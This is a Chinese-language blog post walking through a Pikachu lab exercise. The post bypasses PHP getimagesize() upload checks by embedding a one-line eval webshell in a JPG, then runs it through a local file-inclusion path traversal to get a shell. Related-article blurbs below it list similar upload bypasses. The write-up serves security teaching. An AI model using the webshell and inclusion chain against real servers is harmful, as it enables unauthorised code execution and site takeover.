渗透测试-文件上传之getimagesize函数绕过

已于 2023-01-20 10:39:07 修改
阅读量3.8k 收藏 12
点赞数 1
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-04-25 23:39:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124416062
版权

文件上传之getimagesize函数绕过

文章目录

前言

一、什么是getimagesize函数

getimagegesize()函数用于获取图像代销及相关信息,成功返回一个数组,失败则返回一个错误信息,总之是一个判断图片大小和类型的一个函数,也避免了直接更改后缀名的绕过。

二、文件上传之getimagesize函数绕过

1. getimagesize函数绕过

我们先进行pikachu中的练习,打开代码审计看看
在这里插入图片描述
这里进行实验
在这里插入图片描述
只允许上传图片,而且我将后缀名.php改为.png,但是图片打不开。
我们将一句话木马php和png文件进行合并试一下,有两种方法可以试一下
第一种可以用cmd进行修改,执行命令
copy /b test.jpg+test.php ok.jpg
但是上传的时候报错了,可能文件大小不支持
在这里插入图片描述
所以我们这里进行工具,合成新图片上传
在这里插入图片描述
我们使用这个软件
只需将jpg图片放进去就会进行合成,只能输入jpg图片哦
在这里插入图片描述
输入一句话木马,点击ok,这时图片就插入一句话木马了

<?php @eval($_POST['chopper']); ?>

在这里插入图片描述
我们打开图片发现已经注入了,这时我们进行上传图片
在这里插入图片描述
图片上传成功
我们获得图片路径
uploads/2022/04/25/9173926266b8737e383119814519.jpg
下一步就进行打开获得shell的步骤了

2. 通过文件包含漏洞解析获得webshell

但是我们合成的只是jpg图片,在网站中是无法打开的
我们需要转换为php文件才可以打开,这里我们想到两种方法,一种是解析漏洞,另一种是文件包含漏洞
这里我们使用文件包含漏洞进行解析,来获取shell
首先我们找一个存在文件包含漏洞的平台
我们在pikachu中找一个实验,点击上传文件后,复制网址就行修改就可以了
在这里插入图片描述
http://192.168.222.4/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4
我们只需要将file1.php修改为我们当前图片的路径就行了

找file1.php文件的位置,找当前的目录,往前推一直找到unsafeupload的目录
…/…/unsafeupload/uploads/2022/04/25/9173926266b8737e383119814519.jpg

这是我们file1.php文件的当前路径
D:\phpStudy\WWW\pikachu\vul\fileinclude\include\file1.php

回两级回到文件上传的位置
在这里插入图片描述
进行修改,结果为这个路径
http://192.168.222.4/pikachu/vul/fileinclude/fi_local.php?filename=…/…/unsafeupload/uploads/2022/04/25/9173926266b8737e383119814519.jpg&submit=%E6%8F%90%E4%BA%A4

我们将路径进行打开看一下,是否可以打开
在这里插入图片描述
发现打得开,文件修改成功。
这时文件是php文件,我们可以打开蚁剑进行连接获取shell,
输入网址和密码
在这里插入图片描述
成功获取shell,实验结束。

总结

本次实验是对文件上传漏洞绕过方法的补充,引入了getimagesize函数的绕过方法,结合了图片合成木马技术,文件包含漏洞的知识方法进行绕过,从而获取shell的过程。

炫彩@之星
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【愚公系列】2023年04月 文件上传渗透测试绕过白名单检查(文件头GIF89a)
时光隧道
08-22 5万+
文件上传漏洞是一种安全漏洞,指攻击者通过网站上传功能上传恶意文件来攻击网站的漏洞。攻击者可以通过利用这种漏洞上传恶意文件来执行代码和命令,进而控制网站、窃取敏感信息等。常见的文件上传漏洞主要存在于没有健全的文件上传验证机制的网站中。白名单检查是一种安全机制,用于限制只有列入特定名单中的人员、设备或程序才可以获得访问权限,而不允许其他未经授权的访问。这种机制通常用于保护敏感数据或系统不被未经授权的访问和攻击。在白名单检查中,只有列入白名单的实体允许通过验证,而不在白名单中的所有实体都被阻止访问相关资源。
php getimagesize 函数 - 获取图像信息
阅读之后,对你有帮助,那就点个赞再走吧
11-20 382
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。 语法格式: array getimagesize ( string $filename [, array &$imageinfo ] ) //php自带函数 getimagesize() $img_info = getimages...
突破getimagesize()
最新发布
qq_69100706的博客
08-05 780
在CTF(Capture The Flag)竞赛中,突破函数的限制是一种常见的技巧,用于绕过Web应用程序对上传文件的图像验证。是PHP中用于检查图像文件信息的一个函数,它被广泛用于Web应用中来验证上传的文件是否真的是图像,以及其尺寸和其他元数据。
【pikachu】文件上传漏洞 第三关getimagesize
2202_75354817的博客
07-31 196
pikachu文件上传漏洞
文件上传-文件头绕过getimagesize()
T1ngSh0w的博客
09-21 3105
文件上传漏洞之绕过getimagesize()函数的检验
【漏洞靶场】文件上传后端检测getimagesize()函数绕过--upload-labs
m0_46344990的博客
05-02 1098
一、漏洞描述 在upload-labs第十五关,服务器getimagesize函数检测上传图片类型是否为白名单图片格式来验证上传文件合法性。可以通过制作图片马绕过,再配合文件包含漏洞解析文件来获取服务器配置信息。 二、漏洞发现 先在本地写php脚本若上传成功,且知道上传后文件在网站保存的路径,可通过网页访问获得服务器配置信息,命名为z.php。但是在这里不能用php文件直接上传,需要制作图片马来绕过服务器检测文件二进制头信息。 有两种方法,但都是一个意思,将写入图片里面 方法一:准备z.php和一
文件上传漏洞(客户端绕过,MIMEtipe绕过,getimagesize绕过)
weixin_41472455的博客
05-26 1119
客户端绕过 文件上传的前端绕过主要验证手段为前端的 javascript 代码执行 js验证代码如下: -------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------..
【后端检测-绕过】突破getmagesize()、exif_imagetype()绕过
07-03 870
【后端检测绕过-突破函数限制】
渗透测试-文件上传
SK1ng的博客
09-25 705
文件上传 文件上传漏洞 服务器配置不当,导致任意文件上传 Web应用开启文件上传功能,但没有对文件进行足够的限制 危害 该漏洞可导致攻击者上传任意文件,包括恶意脚本、程序等。如果Web服务器所保存上传文件的可写目录具有执行权限,则可以上传后门文件getshell 条件 Web服务器开启上传功能,且接口对外开放 Web用户对目标目录具有可写权限,甚至执行权限 Web中间件可以解析上传的脚本 验证/绕过 前端验证 JS类防护 如: <script type="text/javascript"&g
渗透测试文件上传漏洞
weixin_45380284的博客
03-06 1705
文件上传漏洞 理论: 文件上传: 用户提交文件到web服务器。 文件上传本身没有问题,问题是文件被上传到哪里,上传之后,服务器如何处理、解释文件。 文件上传漏洞产生的原因; web服务器的文件上传功能在程序设计上的逻辑缺陷 web服务器无法区分识别上传文件的内容和格式 web服务器对文件上传的路径和位置控制不严格 服务器对所上传文件的读、写、执行、和所继承的权限设计不严格 文件上传检查不严 文件上传后修改文件名时处理不当 第三方插件的引入 文件上传漏洞入侵服务器的流程: 1.攻击者分析web站点是否存在缺陷
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3159
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
文件上传漏洞——渗透day11
qq_62716256的博客
09-09 686
文件上传漏洞——渗透day11
安全文件下载与上传之——上传漏洞之——get image size绕过案例和防范措施
温柔小薛的博客
04-06 911
上传漏洞之get image size绕过案例和防范措施 功能 getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息,如果用这个函数来获取类型,从而判断是否是图片的话,会存在问题。 语法格式 array getimagesize ( string KaTeX parse error: Expect...
php 文件上传.htaccess getimagesize和exif_imagetype绕过
qq_45570082的博客
10-03 544
注释符 在.htaccess 中有两个注释符,或者相当于单行注释的符号 \x00 # XBM图片 #define width 1337 #define height 1337 WBMP图片 \x00\x00\x85\x85 这两种方式都可以在文件上传中放在.htaccess中,对getimagesize和exif_imagetype进行绕过 不过 \x00\x00\x85\x85 只能放在文件开头位置 #define width 1337 #define height 1337 可以放
0513 8-4 文件上传之getimagesize 绕过案例和防范措施
qq_42764906的博客
05-13 3733
视频中2张图片的16进制 头几个字符串都是一样的 8950 4e47 打开pikachu在Unsafe Fileupload 中的getimagesize中 上传图片发现正常 核心:getimagesize 这个函数是检查图片的前面16进制来检查是否为图片。如果说在在16进制后面加入恶意代码,就可以神不知鬼不觉的上传图片和本地文件包含漏洞(改URL的)结合 达到入侵的目的!即制作包含恶意代码的图片...
php getimagesize()函数获取图片宽度高度
zhengwish的专栏
05-17 500
输出 Array ( [0] => 170 [1] => 254 [2] => 2 [3] => width="170" height="254" [bits] => 8 [channels] => 3 [mime] => image/jpeg ) 获取宽度和高度的方法 list(width,height)=getimagesize('1.jpg');
PHP 获取图像信息 getimagesize 函数
眺望远方
06-05 661
getimagesize() 函数用于获取图像尺寸,类型等信息。imagesx() 函数用于获取图像的宽度。imagesy() 函数用于获取图像的高度。 getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。 语法: array getimagesize( string filename ) 例子: &...
php函数getimagesize
wusutata的专栏
05-28 889
一.代码段一 $img="images/login_bg.png"; list($width,$height,$type,$attr) = getimagesize($img); echo $attr; ?> 上述代码中 $img是自定义的图片路径名,login.png是目标图片 $width表示图片的宽度 $height表示图片的高度 $type表示图片的类型 $attr
php-getimagesize()的用法
热门推荐
程序人生
08-26 1万+
array getimagesize(string filename)该函数返回一个四无素的矩阵、告诉你所给文件名的图像尺寸。该文件的格式必须是GIF,jpeg或PNG中的任一种。 元素 描述 0宽度的像素数  1高度的像素数  2图像的类型(GIF=1,JPG=2,PNG=3)  3在IMG标记中可用的字符串,如"height=# width=#" 例如:$image_file  = "test
文件上传漏洞与绕过策略解析
"本文主要介绍了文件上传漏洞的常见绕过方法,包括前端js检测、Content-Type验证、文件后缀验证、文件后缀黑名单、文件头验证、文件内容验证以及文件上传与文件包含的结合。文章提供了针对这些验证的破解策略,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值